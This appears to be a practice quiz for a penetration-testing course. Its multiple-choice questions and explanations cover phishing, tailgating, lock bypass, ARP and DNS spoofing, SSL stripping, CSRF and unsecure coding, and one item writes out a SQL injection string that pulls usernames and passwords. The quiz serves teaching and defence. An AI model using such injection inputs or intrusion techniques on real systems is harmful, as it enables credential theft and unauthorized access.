CSIT 188 Midterm CH 3 Practice
117. Which of the following are examples of unsecure coding practices? A. Including comments in the source code B. Checking input fields for properly formatted information C. Including subroutines for handling error conditions D. Digitally signing the code E. Providing verbose error messages
A and E. While commenting an application's source code is a best practice for programmers, it can also create security vulnerability because it provides an attacker (or penetration tester) who views the source code with extensive information about how the application works. Likewise, providing overly verbose error messages may be a best practice while programming the application, but leaving them in the released application can provide an attacker with valuable information.
1. You are conducting a black box penetration test for a client. You have used reconnaissance tools to create a list of employee email addresses within the target organization. You craft an email addressed to all of the employees warning them that they must change their password within 24 hours or they will lose access. When they click the link provided in the email, they are redirected to your own website where their credentials are captured to a text file. What kind of exploit did you use? A. Phishing B. Vishing C. Smishing D. Whaling
A. A phishing attack was used in this scenario because the malicious email was sent indiscriminately to all the employees within the organization.
14. Which exploit relies on a telephone call to convince someone to reveal sensitive information? A. Vishing B. Spear phishing C. Phishing D. Whaling
A. A voice phishing attack (also called a vishing attack) leverages a telephone call instead of email to conduct a phishing exploit. Essentially, the attacker calls a particular employee pretending to be someone else in order to get information.
121. While performing a gray box penetration test, you have discovered that the target organization uses many different operating systems on their computers. You've fingerprinted Windows, Mac OS, and Linux systems. You even found one UNIX server system. In addition, employees are bringing their mobile devices to work and connecting them to the organization's wireless network, so you found many Android and iOS devices. At this point in the test, you need to identify operating system vulnerabilities that exist with high-value devices. What should you do? A. Research the Common Vulnerabilities and Exposures (CVE) database. B. Research the Common Attack Pattern, Enumeration and Classification (CAPEC) database. C. Research the Computer Emergency Response Team (CERT) website. D. Post a question on a penetration testing forum.
A. An effective way to discover vulnerabilities associated with a specific version of an operating system is to consult the Common Vulnerabilities and Exposures (CVE) database. The CVE database can be accessed at http://cve.mitre.org. It contains a list of publicly known cybersecurity vulnerabilities. Whenever a vendor discovers a vulnerability with their product, they add an entry to the CVE database. This database contains vulnerability information for Windows, Mac OS, Linux, UNIX, Android, and iOS operating systems.
42. A penetration tester impersonates a vending machine repair person to gain physical access to the target organization's facility. Once inside, he notices that the door to the server room uses a simple pushbutton door lock that doesn't use any kind of electronic authentication. Which physical security attack could he use to gain access to the server room? A. Lock picking B. Tailgating C. Fence jumping D. Egress sensor bypass
A. Because the server room is protected by a relatively unsophisticated locking mechanism, the penetration tester could pick the lock to gain access, assuming he has the necessary lock-picking skills. Note that this would have to be done in an area without surveillance or foot traffic as it may take some time to complete.
85. During a gray box penetration test, the tester decides to stress test the target organization's file server by sending it a flood of half-open TCP connections that never actually get completed. What kind of exploit is this? A. Denial of service (DoS) B. Distributed denial of service (DDoS) C. Replay attack D. NAC bypass
A. By flooding the server with half-open TCP connections that never get completed, the tester makes it such that it doesn't have enough resources to service legitimate network requests. Because only one host was used to conduct the stress test, this is an example of standard denial-of-service (DoS) attack.
21. A penetration tester sends a spear phishing email to an employee of the target organization, claiming to be the director of operations. The email asks the employee to reply with sensitive internal information. What motivation factor did the penetration tester use in this scenario? A. Authority B. Scarcity C. Social proof D. Likeness
A. By masquerading as an upper-level manager, the penetration tester in this example utilized an appeal to authority to coerce the employee into divulging sensitive information.
84. During a gray box penetration test, the tester wants to implement a downgrade man-in- the-middle attack to reduce the security of web browser sessions from TLS to SSL. What exploit can the attacker use to trick client workstations into thinking her workstation is the web server and vice versa? A. ARP spoofing B. Replay attack C. Pass the Hash D. SYN attack
A. By sending fake ARP messages, the tester's workstation can fool client workstations into thinking it is the web server by associating the server's IP address with her workstation's MAC address. Likewise, the server can be fooled into thinking her workstation is the end user's workstation by doing the same thing, sending a fake ARP message to the server mapping the client's IP address to her workstation's MAC address.
90. Which method is commonly used to hop between VLANs? A. Double-tagging B. Brute-force attacks C. MAC address spoofing D. DNS poisoning
A. Double-tagging of VLAN tags is allowed in the 802.1q specification. This allows a host to "hop" between VLANs.
41. A penetration tester rifles through the target organization's garbage and finds an optical disc. He reads the disc on his laptop and finds that it contains several very sensitive files from human resources. What kind of exploit occurred in this scenario? A. Dumpster diving B. Tailgating C. Fence jumping D. Egress sensor bypass
A. Dumpster diving occurs when an attacker searches through the target organization's garbage looking for sensitive information.
49. A penetration tester observes that the target organization's garbage is picked up early in the morning every Tuesday. Late Monday night, she climbs into the organization's garbage receptacle and gathers discarded documents, optical discs, and storage devices such as flash drives. What kind of exploit occurred in this scenario? A. Dumpster diving B. Tailgating C. Fence jumping D. Egress sensor bypass
A. Dumpster diving occurs when an attacker searches through the target organization's garbage looking for sensitive information.
114. Which security misconfiguration on a web server would allow an end user accessing the site with a web browser to navigate through the web server's file system? A. Directory transversal B. Cookie manipulation C. File inclusion D. Weak credentials
A. If the directory transversal has been allowed in the web server's configuration, then it could potentially expose the file system of the web server to users accessing the site in a web browser, including directories outside of the web server's root directory. For example, the Apache web server can be run in a chroot jail to prevent users from accessing directories outside of the web server's directories.
7. You are performing a black box penetration test for a large financial organization. Using reconnaissance techniques, you have identified the vendor that services the vending machines within the organization's main headquarters. You dress in a similar uniform as the vendor's employees. You also purchase a hand truck and several cases of soda pop. The receptionist of the target organization allows you to enter and directs you to the break room. What kind of exploit did you use in this scenario? A. Impersonation B. Smishing C. Vishing D. Elicitation
A. Impersonation is a social engineering technique that can be used by a penetration tester to gain physical access to the target's facility. In this scenario, the receptionist allowed the tester to access the organization's facility because the tester appears to be from a trusted vendor.
92. Which wireless exploit uses a special wireless device to listen for SSID requests from other wireless devices and then impersonate the requested access point? A. Karma attack B. Deauth attack C. Downgrade attack D. Rogue access point
A. In a Karma attack, the tester uses a special wireless device to listen for SSID requests from other devices and then respond as if it were the requested access point. Victims think they are connected to a legitimate network, but they are actually connected directly to the tester. The tester typically forwards victims' traffic to the Internet, so everything seems normal. This allows the tester to inspect the victim's traffic and capture sensitive information.
12. Which exploit sends emails indiscriminately to a large number of the target organization's employees, anticipating that a percentage of them will click the malicious link contained in the message? A. Phishing B. Spear phishing C. SMS phishing D. Whaling
A. In a standard phishing exploit, email messages are sent indiscriminately to a large number of individuals, hoping that a percentage of them will click the malicious link contained in the message.
81. Which type of exploit fools a web server into presenting a user's web browser with an HTTP connection instead of an HTTPS connection as the user originally requested? A. SSL stripping B. Relay attack C. NAC bypass D. Cross-site scripting
A. In an SSL stripping attack, a user sends an HTTPS request to a web server. This is done to ensure that communications between the server and the browser are encrypted. However, the exploit fools the web server into thinking the user wants a standard HTTP connection, and an unencrypted session is established. Unless the user is watching carefully, the user may not realize that this has happened.
16. Which social engineering technique is least likely to be used during a penetration test? A. Interrogation B. Impersonation C. Shoulder surfing D. USB key drop
A. Interrogation involves questioning an employee of the target organization, using fear as a motivation to gather information. Interrogation is not a technique that is typically used by penetration testers because it would likely result in criminal charges against the tester as well as civil litigation.
52. Which of the following features of an egress sensor can be manipulated to allow a penetration tester to enter a building without authorization? A. Emergency fail open B. Automatic locking C. Automatic unlocking via motion sensor for egress D. Automatic unlocking via light sensor for egress
A. Most automatically locking door systems have some type of emergency fail open mechanism. The idea behind this is that if there is an emergency of some sort, such as a fire, then the doors must automatically unlock to prevent people from being trapped inside or preventing emergency personnel from entering. If you can figure out what fail open mechanism is used, you may be able to manually trigger it to open a locked door.
35. Which motivation factor gets people to act because they want to please the person making a request of them? A. Likeness B. Social proof C. Authority D. Scarcity
A. Most people will help someone they perceive to be a friend. This is called likeness. When someone they believe to be a friend needs help, they may bend or break the rules to help the person out.
56. During the information gathering phase of a gray box penetration test, you run the NBTSTAT -c command on the local network. One of the lines in the output reads as follows: Name Type Host Address Life [sec] ------------------------------------------------------------ DEV-1 <20> UNIQUE 10.0.0.3 517 What do you know about the DEV-1 host? A. It is a server. B. It is a workstation. C. It is a router. D. It is a wireless device.
A. NBTSTAT identifies NetBIOS servers with an ID of <20>. Based on this output, you know that DEV-1 is most likely a Windows server (or a Linux server running the Samba service).
55. A penetration tester is performing a gray box test for a client. During a network scan, she notices a host that has TCP port 139 open. She suspects this is a Windows system, so she runs the NBTSTAT command and discovers key information about the host. Which protocol on the remote host allowed the tester to gather this information? A. NetBIOS B. SNMP C. NAC D. SMTP
A. NetBIOS is a transport protocol used by Windows systems to share resources, such as shared folders or printers. Once an attacker identifies that port 139 is open on a device, NBTSTAT can be used to footprint the device. For example, you could discover the device's computer name and identify whether it is a workstation or a server. All of this information can be gathered without any kind of authentication.
87. Which of the following prevents unauthorized or unhealthy devices from connecting to a network, even if they connect to the wired or wireless network properly? A. Network Access Control (NAC) B. WPA2-PSK C. Virtual LANs (VLANs) D. Spanning Tree Protocol (STP)
A. Network access control (NAC) systems require network hosts to meet security policy requirements before being allowed to access the network, even if they have properly been connected to a network jack or associated with an access point. Unauthorized or unhealthy devices are usually placed on an isolated remediation network until they are authorized or until they are brought into compliance. After doing so, they are allowed to connect to the actual network segment.
71. Which of the following is a mechanism that can be used to defend against DNS poisoning attacks? A. Implement DNSSEC. B. Close port 53 in the DNS server's host firewall. C. Disable ICMP forwarding in your router configuration. D. Use SSH for DNS queries.
A. One way to defend against DNS poisoning is to implement DNSSEC. DNSSEC signs each DNS request with a digital signature to ensure authenticity. This makes it difficult to insert poisoned records.
67. During a gray box penetration test, you discover an open SMTP service running on an older database server. You want to use this SMTP service to send whaling emails to the organization's CEO and CFO. How can you do this remotely from your laptop? A. Telnet to the SMTP server's IP address on port 25 and create the messages. B. Use physical security exploits to gain access to the server console where you can create the messages. C. Use impersonation to trick the server administrator into revealing its Remote Desktop password. D. None of the above.
A. One way to leveraging an open SMTP service to send unauthorized email messages is to connect to the SMTP server's IP address on port 25 using a Telnet client. Once the connection has been established, you can use the command-line interface to create and send the messages.
32. Which motivation factor gets people to act because they believe that "everyone else is doing it"? A. Social proof B. Fear C. Scarcity D. Authority
A. People can be motivated to act if they think that everyone else is doing the same thing. This is called social proof. The (flawed) assumption is that if everyone else is doing something, it must be the right thing to do.
37. A penetration tester enters the target organization's physical facility by walking behind an employee and grabbing the authentication-protected door before it shuts all of the way. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
A. Piggybacking occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person's knowledge or consent.
47. A penetration tester observes that many employees of the target organization congregate outside the back door of the facility at 10 a.m. and 2 p.m. to smoke cigarettes. The next day, the tester joins the group and pretends to smoke with them. When the group finishes smoking, the tester walks through the back door behind the group. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
A. Piggybacking occurs when an intruder tags along with one or more an authorized people through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person's knowledge or consent.
39. A penetration tester waits in the target organization's parking lot until she sees a large group of employees returning from lunch. She inserts herself quietly at the back of the group. The first person in the group uses his badge to unlock a secured door. The penetration tester is able to move through the door with the rest of the group. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
A. Piggybacking occurs when an intruder tags along with one or more authorized people through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person's knowledge or consent.
64. Which port is used by the SNMP protocol? A. UDP 161 B. TCP 23 C. TCP 389 D. UDP 88
A. The SNMP protocol runs on UDP port 161.
27. During a penetration test, you send an email to the CFO of the target organization. The email claims that the webcam on the CFO's laptop has been clandestinely used to record him viewing pornography. The email threatens to post this video and notify his family, his employer, and the police if he doesn't respond with certain sensitive information about his company. Which motivation factor was used in this scenario? A. Fear B. Social proof C. Authority D. Scarcity
A. The penetration tester is using fear as a motivating factor. Whether the claim is true or not, the CFO knows that such a revelation could damage his family and career. It could also expose him to prosecution. This could potentially motivate him to divulge sensitive information.
24. A penetration tester sends a phishing email to the employees of the target organization. The link in the email leads to a fake website that lists more than 1,000 reviews with an average rating of 4.9 stars. What motivation factor did the penetration tester use in this scenario? A. Social proof B. Urgency C. Scarcity D. Authority
A. The penetration tester is using social proof as a motivating factor. Because it appears that more than 1,000 people have had a positive experience with the website, most of the employees will probably trust the site, even if it asks them to divulge sensitive information.
107. The network administrator for an organization that is the target of a penetration test configured her network firewall with an administrative username of admin and a password of password. Which authentication exploit is this device vulnerable to? A. Weak credentials exploit B. Redirect attack C. Session hijacking D. Kerberos exploit
A. This device is vulnerable to a weak credentials exploit because the administrative username and password are easy to guess.
80. During a gray box penetration test, the tester is able to intercept packets being transmitted from a client to a server. The tester's workstation poses as the server to the client. The tester views the data in the packets but does not modify it before forwarding the data on to the server. What kind of exploit is this? A. Relay attack B. DNS cache spoofing C. Pass the hash D. Replay attack
A. This is also an example of a relay attack. The attacker sits in between two hosts communicating on the network, in this case a workstation and a server. To the server, the attacker poses as the workstation. To the workstation, the attacker poses as the server. In a relay attack, the man-in-the-middle may or may not modify the data being transmitted between the two hosts.
70. You are conducting a gray box penetration test. You want to capture C-level executives' authentication credentials. To accomplish this, you set up a fake internal web server that looks exactly like the web server used to manage employee time-off and reimbursement requests. You inject a fake DNS record into the organization's DNS server that redirects traffic from the real server to your fake server. What is this exploit called? A. DNS poisoning B. ARP poisoning C. Phishing D. Whaling
A. This is an example of DNS poisoning. This exploit leverages the trust users have in a URL that appears to be valid. Because users enter a valid URL, they have no idea than an exploit is being conducted. However, the DNS server itself has been reconfigured to resolve the domain name in URL to the IP address of the malicious server.
102. A penetration tester is searching for vulnerabilities within a web application used by the target organization. In the login page, she enters the following string of text in the Password field: UNION SELECT Username, Password FROM Users; What type of exploit is being used in this example? A. SQL injection B. HTML injection C. Command injection D. Code injection
A. This is an example of a SQL injection attack. Instead of entering a password into the Password field, the tester inserts a SQL statement. If the web application in this example was poorly written, then it is possible that it would pull usernames and passwords for every user in the hypothetical database. The UNION SELECT statement is used to combine two unrelated SELECT queries to retrieve data from different database tables. A wellwritten application will use input validation to prevent SQL statements from being submitted within a user form. The same principles apply to HTML injection, command injection, and code injection attacks.
103. A penetration tester reviews social media accounts owned by the target organization's CIO and makes a list of possible passwords such as her spouse's name, pet's name, favorite sports teams, and so on. The tester tries to log on to the CIO's account using one possible password after another, trying to find one that works. What type of authentication exploit is this? A. Credential brute-forcing B. Session hijacking C. Redirect attack D. Password cracking
A. This is an example of a credential brute-forcing attack. In a true brute-force attack, all possible letter, number, and special character combinations would be tried one after another until the right one is found. However, by creating a list of likely passwords based on the user's personal interests, the probability of success is greatly increased.
79. During a gray box penetration test, the tester is able to intercept packets being transmitted from a client to a server. The tester's workstation poses as the server to the client. The tester is able to modify the data in the packets and then send it on to the server. The tester's workstation poses as the client to the server. What kind of exploit is this? A. Relay attack B. DNS cache spoofing C. Pass the hash D. Replay attack
A. This is an example of a relay attack. The attacker sits in between two hosts communicating on the network, in this case a workstation and a server. To the server, the attacker poses as the workstation. To the workstation, the attacker poses as the server.
4. You are performing a black box penetration test for a medium-sized organization that sells imported clothing. You have used reconnaissance techniques to identify a key software developer. You send this employee a personalized text message containing a Bitly URL that points to your own website where you capture information to a text file. What kind of exploit did you use in this scenario? A. Phishing B. Smishing C. Vishing D. Whaling
B. A SMS phishing attack (also called a smishing attack) was used in this scenario. A smishing attack leverages text messaging instead of email to conduct a phishing exploit.
5. You are performing a black box penetration test for a small organization that wholesales imported electronic devices in the United States. You have used reconnaissance techniques to identify a receptionist's phone number as well as the organization's printer vendor. You call this receptionist, pretending to be a sales rep from the vendor. You ask the receptionist for information about their printers, workstations, operating systems, and so on, to learn more about the organization's network infrastructure. What kind of exploit did you use in this scenario? A. Smishing B. Vishing C. Spear phishing D. Whaling
B. A voice phishing attack (also called a vishing attack) was used in this scenario. A vishing attack leverages a telephone call instead of email to conduct a phishing exploit. Essentially, the attacker calls a particular employee pretending to be someone else in order to get information.
76. An ARP spoofing attack is categorized as which type of exploit? A. Denial of service (DoS) B. Man-in-the-middle C. Distributed denial of service (DDoS) D. VLAN hopping
B. An ARP spoofing attack is classified as a man-in-the-middle attack.
86. During a gray box penetration test, the tester decides to stress test a critical network router. She sends thousands of ping requests addressed to all of the hosts on the subnet. However, she spoofs the source address of the requests to the IP address of the network router. As a result, the router is flooded with ICMP echo response traffic that it didn't initiate, making it difficult for it to respond to legitimate network requests. What kind of exploit is this? A. Denial of service (DoS) B. Distributed denial of service (DDoS) C. Replay attack D. NAC bypass
B. By flooding the router with bogus ICMP traffic, the tester makes it difficult for the router to service legitimate network requests. Because multiple hosts were used to conduct the stress test, this is an example of standard distributed denial of service (DDoS) attack.
23. A penetration tester sends a spear phishing email to an employee of the target organization, claiming to be a fellow employee who has forgotten her password. The email indicates she has a presentation in a few minutes and can't access her presentation files on a shared network drive. She asks the employee to "loan" her his username and password so she can log on and get the files. What motivation factor did the penetration tester use in this scenario? A. Fear B. Urgency C. Authority D. Scarcity
B. By masquerading as a fellow employee in great distress in this scenario, the penetration tester is using urgency to motivate the employee to give up his username and password. She may also be using likeability as a factor.
115. Which security misconfiguration would allow a script run by the user's web browser to write data to a client-side cookie? A. Directory transversal B. Cookie manipulation C. Cross-site request forgery (XSRF) D. Clickjacking
B. Cookie manipulation is a client-side security misconfiguration that allows a script running within a browser to write data to a client-side cookie.
11. You have been hired to conduct a black box penetration test for a client. You purchase a small flash drive and load it with malware that installs a keylogger on the victim's computer and sends the information it captures to you. You walk in the client's front door and ask the receptionist for directions to a nearby sports venue. While you are speaking, you deliberately drop the drive on the floor and then leave. Which exploit was used in this scenario? A. Shoulder surfing B. USB key drop C. Phishing D. Elicitation
B. In a USB key drop exploit, some type of malware is usually loaded on a flash drive. That drive is then deliberately left somewhere that an employee of the target organization will likely find it. The goal is for the employee to plug it in to see what it contains. When this happens, the malware is automatically loaded on the victim's computer.
98. Which wireless exploit involves creating an unauthorized connection with a Bluetooth device, such as a mobile phone, and stealing information from it? A. Deauth attack B. Bluesnarfing C. Bluejacking D. WPS cracking
B. In a bluesnarfing wireless exploit, an unauthorized Bluetooth connection is established with a wireless device, such as a mobile phone. That connection is then used to steal information from that device.
95. Which wireless exploit could be carried out by creating a fake captive portal for a wireless network that captures victims' usernames and passwords? A. Repeating attack B. Credential harvesting C. Bluesnarfing D. Jamming attack
B. In a credential harvesting attack, a fake website that looks like a legitimate website is used to capture victims' usernames and passwords. In the context of a wireless exploit, this could be accomplished using a fake captive portal that looks like a legitimate captive portal that captures victims' information.
101. A penetration tester impersonates a vending machine repair person to gain access to the target organization's facility. While inside, the tester hides a wireless device behind a vending machine that captures the organization's wireless network radio signal and rebroadcasts it with high gain towards the parking lot. Which wireless exploit did the tester employ in this scenario? A. Karma attack B. Repeating attack C. Downgrade attack D. Jamming attack
B. In a repeating attack, the penetration tester captures the target organization's wireless network radio signal and rebroadcasts it with high gain to extend its range. In this scenario, the organization's wireless network can now be accessed by the penetration tester from the parking lot.
83. During a gray box penetration test, the tester acts as a man-in-the-middle between a web server and an end user's workstation. When the user's browser requests a page from the web server using TLS 1.2, the tester alters the request and specifies that SSL 2.0 be used instead to protect the session. What kind of exploit has occurred in this scenario? A. SSL stripping B. Downgrade C. NAC bypass D. Replay attack
B. In this example, a downgrade man-in-the-middle attack has occurred because SSL 2.0 is less secure than TLS 1.2. Unless the user is exceptionally vigilant, they will likely not notice that SSL is being used to protect the session instead of TLS.
66. During a gray box penetration test, you discover an open SMTP service running on an older database server. You want to use this SMTP service to send phishing emails to users within the organization. What is this exploit called? A. Distributed denial of service B. SMTP relay C. Fraggle D. Teardrop
B. Leveraging an open SMTP service to send unauthorized email messages is called SMTP relay. Most new systems have provisions in place to prevent this from happening, but many older server systems do not.
43. A penetration tester impersonates a heating and cooling repair person to gain physical access to the target organization's facility. Once inside, she requests access to the server room to investigate a problem with the cold air return. As she is leaving the server room, she surreptitiously places a piece of strong tape over the door locking tab, allowing her to return into the room later without authorization. What is this technique called? A. Lock picking B. Lock bypass C. Fence jumping D. Badge cloning
B. Lock bypass occurs when an attacker prevents a door's locking mechanism from working. For example, this could be done by placing tape over the locking tab, as was done in this scenario.
51. A penetration tester impersonates a heating and cooling repair person to gain physical access to the target organization's facility. Once inside, she requests access to the server room to investigate a problem with the cold air return. As she is leaving the server room, she surreptitiously places a small wooden wedge into the door jam, preventing the door from closing completely. This allows her to return into the room later without authorization. What is this technique called? A. Lock picking B. Lock bypass C. Fence jumping D. Badge cloning
B. Lock bypass occurs when an attacker prevents a door's locking mechanism from working. In this example, this was done by placing a wooden wedge in the door jamb, preventing the door from closing completely and preventing the locking mechanism from engaging.
34. Which motivation factor gets people to act quickly because they believe someone needs help? A. Social proof B. Urgency C. Scarcity D. Authority
B. Many people are naturally motivated to help others in distress. This is called urgency. When they believe someone needs help, they may bend or break the rules to help the person out.
36. Which motivation factor gets people to act because they worry about the consequences of not acting? A. Social proof B. Fear C. Scarcity D. Authority
B. Most people will respond to a request to act if they are made to fear the consequences of failing to act. This is one of the most basic human motivations.
57. During the information gathering phase of a gray box penetration test, you run the NBTSTAT -c command on the local network. One of the lines in the output reads as follows: Name Type Host Address Life [sec] ------------------------------------------------------------ PROD-9 <00> UNIQUE 10.0.0.132 517 What do you know about the PROD-9 host? A. It is a server. B. It is a workstation. C. It is a router. D. It is a wireless device.
B. NBTSTAT identifies NetBIOS workstations with an ID of <00>. Based on this output, you know that PROD-9 is most likely a Windows workstation (or a Linux workstation running the Samba service).
88. During a gray box penetration test, you try to connect your laptop to the target's wireless network. However, the target has implemented a NAC that is blocking your laptop from connecting to the production network. What can you do? A. Run a brute-force decryption attack to defeat the IPSec encryption that protects the production network. B. Spoof your laptop with the MAC address of an authorized device. C. Plug your laptop into a wired jack. D. Create an evil twin access point.
B. One way to conduct a NAC bypass exploit is to spoof the tester's system with the MAC address of an authorized device. As long as the tester's system meets the organization security policy requirements, the NAC system should allow it to access the production network.
38. A penetration tester enters the target organization's physical facility by striking up a conversation with an employee in the parking lot and walking with her through a door that uses a proximity badge reader to control access. The employee uses her badge to open the door and holds it open for the penetration tester. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
B. Tailgating occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This happens with the authorized person's knowledge and/or consent.
46. A penetration tester waits in the target organization's parking lot early in the morning until she sees an employee heading toward the front door. She walks up behind the employee while clumsily carrying several large boxes. She asks the employee to hold the door for her and is able to enter the facility. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
B. Tailgating occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This occurs with the authorized person's knowledge and/or consent. In this example, the authorized employee held the door open for the penetration tester.
65. What is the function of the Simple Mail Transfer Protocol (SMTP)? A. To share files on the network B. To transfer email messages between mail transfer agents (MTAs) C. To map IP addresses to MAC addresses D. To transfer email messages to a mail user agent (MUA)
B. The SMTP protocol is used to transfer email messages between mail transfer agents (MTAs).
29. A penetration tester sends an email to an employee of the target organization, claiming to be a sales rep on the road. She claims in the email that her VPN connection from her hotel is running extremely slow and that she can't access her client's data. If she doesn't get the data, she will lose the sale. The message asks the employee to email her a copy of the files. What motivation factor did the penetration tester use in this scenario? A. Social proof B. Urgency C. Scarcity D. Authority
B. The penetration tester is using urgency (and possibly likeness) as a motivating factor. The employee will probably comply with the request out of a desire to be seen as a "team player." This type of attack can be made even more effective by conducting reconnaissance beforehand and identifying the names of real sales reps working for the organization.
75. During a gray box penetration test, the tester sends a fake ARP broadcast message on the local network segment. As a result, her laptop's MAC address is now mapped to the IP address of another valid computer on the segment. What is this exploit called? A. DNS cache poisoning B. ARP spoofing C. Pass the hash D. Replay attack
B. This is an example of ARP spoofing. In this exploit, the tester sends a fake ARP broadcast on the network segment that maps the IP address of a legitimate network host to her MAC address. As a result, all traffic addressed to the legitimate host gets redirected to the tester's system.
112. During a gray box penetration test, the tester notices that the organization's human resources self-service web application uses Active Directory user accounts for authentication. It also includes a "Remember me" option on the login page. The tester sends an email message to high-level employees within the organization with the subject line "Check out this funny picture." When the email is opened, hidden HTML code actually sends an HTTP request to the self-service web application that changes the user's password. The attack relies on the saved session cookie from the site to work. What type of authentication exploit is this? A. Cross-site scripting (XSS) B. Cross-site request forgery (CSRF) C. Clickjacking D. Credential brute forcing
B. This is an example of a cross-site request forgery (CSRF). Because the session cookie from the website was saved locally, the user is perpetually logged on to the site. Therefore, the HTTP request to change the user's password contained in the email message didn't require authentication to execute. The penetration tester can now log on to Active Directory as a high-level employee.
20. You are performing reconnaissance as a part of a black box penetration test. You notice that the employees of the target organization commonly congregate at a particular outdoor restaurant for lunch. You begin frequenting the same restaurant for lunch and make friends with several of the target organization's employees. After you gain their trust, they begin to share information about their jobs, computers, bosses, customers, projects, and so on. What type of exploit occurred in this scenario? A. Whaling B. Elicitation C. Interrogation D. Phishing
B. This is an example of elicitation. By gaining the employees' trust, the tester was able to elicit sensitive information from them about their employer.
104. During a gray box penetration test, the tester uses Wireshark to sniff the network traffic between an employee's web browser and a website and is able to capture the session cookie. The tester is then able to impersonate the victim without capturing the user's actual authentication credentials. What type of authentication exploit was used in this scenario? A. Kerberos exploit B. Session hijacking C. Redirect attack D. Password cracking
B. This is an example of session hijacking. The tester was able to exploit the session key (the cookie) to gain access to the user's session. This type of exploit can be used for web applications where an HTTP cookie is used to maintain a session. Even though the site may have used TLS/SSL to encrypt authentication credentials, the session cookie is many times not encrypted. If it is captured, it allows the tester to hijack the user's session.
118. Which of the following are examples of unsecure coding practices? A. Removing comments from the source code before release B. Checking input fields for properly formatted information C. Lack of error handling routines D. Lack of code signing E. Removing overly verbose error messages
C and D. The programmer should be sure to include routines that tell the application what to do should it encounter an error condition. For example, many buffer overflow attacks exploit applications that don't know how to respond when they receive more information than they were expecting. Likewise, all applications should have their code digitally signed. This will expose any unauthorized modifications made to the code.
13. Which exploit relies on text messaging to deliver phishing messages? A. Elicitation B. Spear phishing C. SMS phishing D. Whaling
C. A SMS phishing attack (also called a smishing attack) leverages text messaging instead of email to conduct a phishing exploit.
2. You are performing a gray box penetration test for a medium-sized organization. You have used reconnaissance techniques to identify a help desk employee and a payroll employee. You craft an email to the payroll employee that appears to come from the help desk employee directing the payroll employee to reset her password. When she clicks the link provided in the email, she is redirected to your own website where her credentials are captured to a text file. What kind of exploit did you use? A. Phishing B. Interrogation C. Spear phishing D. Whaling
C. A spear phishing attack was used in this scenario because the malicious email was specifically crafted for a specific employee. A generic phishing attack, on the other hand, would have been sent indiscriminately to a large group of employees within the organization.
45. While waiting in line at a food truck behind an employee of the target organization, a penetration tester steals her access badge and makes a copy of its RFID signature on a fake access badge. What is this technique called? A. Egress sensor bypass B. Lock bypass C. Badge cloning D. Fence jumping
C. Badge cloning occurs when an attacker makes a copy of a valid access badge in order to enter a facility. By copying a valid badge's RFID signature, the penetration tester in this scenario can use the fake badge to access the target organization's facility using the authorized employee's credentials.
97. Which wireless exploit involves sending unsolicited messages over a Bluetooth connection to a wireless device? A. Deauth attack B. Bluesnarfing C. Bluejacking D. WPS cracking
C. In a bluejacking wireless exploit, unsolicited messages are sent over a Bluetooth connection to wireless devices, such as a mobile phone.
113. Which authentication exploit utilizes transparent layers within the same web page to trick a user into clicking a button or link when they thought they were just clicking the top-level layer of the page? A. File inclusion B. Cross-site request forgery (CSRF) C. Clickjacking D. Cookie manipulation
C. In a clickjacking exploit, the tester adds transparent layers to a web page in an attempt to fool a user into clicking a hidden button or link on a transparent layer. This allows the tester to hijack user clicks and send them to a different website (such as a credential harvesting site).
69. While performing a black box penetration test, you identify a significant amount of FTP data being transferred between an unknown internal host on the target network and hosts on the Internet on ports 20 and 21. How could you exploit this traffic to gain access to systems on the target network? A. Conduct a distributed denial-of-service (DDoS) attack. B. Conduct a land attack. C. Capture the FTP traffic with a sniffer. D. Use anonymous FTP access to upload a keylogger to the FTP server.
C. One of the key weaknesses with the FTP protocol is the fact that it transmits all data between the FTP server and the FTP client as clear text, including authentication credentials. By sniffing the FTP traffic, you may be able to capture FTP usernames and passwords. Some FTP server implementations leverage existing network user accounts and passwords to authenticate FTP connections. So, by capturing FTP authentication credentials, you could potentially be capturing internal network user accounts and passwords too.
33. Which motivation factor gets people to act because someone with clout wants them to? A. Likeness B. Social proof C. Authority D. Scarcity
C. People are naturally motivated by a respect for authority. When they believe someone in authority wants them to do something, they will frequently comply, especially if the request is coupled with a sense of urgency.
31. Which motivation factor gets people to act quickly due to a sense of limited supply? A. Social proof B. Likeness C. Scarcity D. Authority
C. People can be motivated to act quickly when they believe something they want is in limited supply. This is called scarcity. They don't want to miss out on an opportunity, product, deal, or service that will soon become unavailable.
82. What is the best way to defend against an SSL stripping attack? A. Update the virus definitions on user's workstations. B. Implement a network intrusion detection (NID) device. C. Implement a strict HSTS policy that prevents a user's browser from opening a page unless an HTTPS connection has been used. D. Reconfigure all browsers to require TLS sessions.
C. The best way to defend against an SSL stripping attack is to implement an HTTP Strict Transport Security (HSTS) policy that prevents a user's browser from opening a web page unless an HTTPS connection has been used to transfer the page from the web server to the client.
28. A penetration tester sends an email to a sales rep of the target organization, claiming to be the CEO of one of the organization's most important clients. The email asks the employee to create a VPN account to allow the CEO access to certain files on the organization's network. The email threatens to terminate the business relationship if this doesn't happen. What motivation factor did the penetration tester use in this scenario? A. Likeness B. Social proof C. Authority D. Scarcity
C. The penetration tester is using authority (and probably urgency along with fear) as a motivating factor. The sales rep may be inclined to create the VPN connection to prevent the supposed loss of an important client.
18. You have been hired to conduct a black box penetration test for a client. You walk into the organization's main entrance and ask the receptionist for information about current job openings. You watch the keystrokes she types on her computer in hopes of capturing sensitive information that you can use to gain access to the internal network. What kind of exploit was used in this scenario? A. Spear phishing B. Impersonation C. Shoulder surfing D. USB key drop E. Business email compromise
C. The penetration tester used shoulder surfing techniques in this scenario. In shoulder surfing, the tester observes information that employees type or display on their computers in an attempt to gather sensitive information. For example, the tester may use shoulder surfing to gather usernames, passwords, email addresses, phone numbers, file server share names, and so on.
120. A web application developer included the following HTML code within a form page: <input type=hidden> This is an example of which unsecure code practice? A. Comments in source code B. Hidden elements C. Unauthorized use of functions/unprotected APIs D. Race conditions
